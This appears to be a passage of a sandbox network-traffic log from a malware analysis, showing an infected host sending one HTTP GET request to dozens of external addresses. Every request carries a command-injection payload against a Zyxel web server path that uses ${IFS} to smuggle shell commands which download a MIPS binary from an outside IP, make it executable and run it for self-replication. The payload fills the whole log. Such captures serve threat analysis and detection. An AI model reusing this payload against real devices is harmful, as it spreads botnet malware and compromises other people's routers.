                                                Jan 12, 2024 18:16:16.275388956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2629192.168.2.2349288170.107.63.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275420904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2630192.168.2.2355252196.69.135.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275461912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2631192.168.2.2343860169.224.39.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275486946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2632192.168.2.2337846128.13.135.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275523901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2633192.168.2.2334278101.50.77.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275594950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2634192.168.2.234437290.39.33.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275646925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2635192.168.2.2360468130.123.221.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275696039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2636192.168.2.2353254180.245.116.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275746107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2637192.168.2.2351656113.113.46.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275803089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2638192.168.2.2349376159.247.94.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275836945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2639192.168.2.2339502160.66.80.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275954008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2640192.168.2.2334232219.134.48.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276005030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2641192.168.2.2355042132.225.211.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276052952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2642192.168.2.2342284154.20.229.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276101112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2643192.168.2.2341582188.129.222.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276128054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2644192.168.2.2347250103.31.118.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276177883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2645192.168.2.2356964192.29.226.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276190996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2646192.168.2.2347606101.54.158.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276257038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2647192.168.2.234673099.167.248.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276307106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2648192.168.2.2348430107.94.123.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276340008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2649192.168.2.235896251.171.207.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276371956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2650192.168.2.2354684179.140.103.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276411057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2651192.168.2.235161436.83.7.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276451111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2652192.168.2.233938446.226.59.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276487112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2653192.168.2.2359600116.220.117.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276535034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2654192.168.2.2342108158.72.35.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276576996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2655192.168.2.2357380221.210.174.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276611090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2656192.168.2.233535480.143.156.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276649952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2657192.168.2.2359686179.130.63.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276683092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2658192.168.2.2353398158.152.155.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276736021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2659192.168.2.2345994217.19.54.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276757002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2660192.168.2.2355942109.105.96.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276815891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2661192.168.2.234752832.121.189.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276859999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2662192.168.2.2349678128.149.165.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276896954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2663192.168.2.2346782134.180.163.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276941061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2664192.168.2.2353884197.220.31.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.276990891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2665192.168.2.234802438.86.40.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277034044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2666192.168.2.234176663.118.236.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277076960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2667192.168.2.2356478203.244.76.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277108908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2668192.168.2.233637247.104.70.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277194023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2669192.168.2.233889099.195.0.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277239084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2670192.168.2.235506243.144.212.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277271032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2671192.168.2.233437888.70.113.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277324915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2672192.168.2.2345574220.16.15.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277367115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2673192.168.2.2356476119.130.72.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277393103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2674192.168.2.2346466148.247.247.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277429104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2675192.168.2.23460184.120.196.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277479887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2676192.168.2.2353514183.152.221.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277502060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2677192.168.2.235199693.167.190.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277550936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2678192.168.2.2341180164.0.65.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277601957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2679192.168.2.2334562110.216.106.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277630091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2680192.168.2.235848632.8.117.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277687073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2681192.168.2.2350820211.119.59.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277740955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2682192.168.2.2360938205.187.160.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277777910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2683192.168.2.2354722116.163.28.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277825117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2684192.168.2.235292614.8.202.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277892113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2685192.168.2.234399254.114.23.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277951002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2686192.168.2.2344932138.6.128.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.277985096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2687192.168.2.235724258.80.124.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278039932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2688192.168.2.236094866.220.84.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278073072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2689192.168.2.235334887.24.120.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278120995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2690192.168.2.2342642134.206.49.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278141022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2691192.168.2.2357856160.51.196.165443
                                                TimestampBytes transferredDirectionData
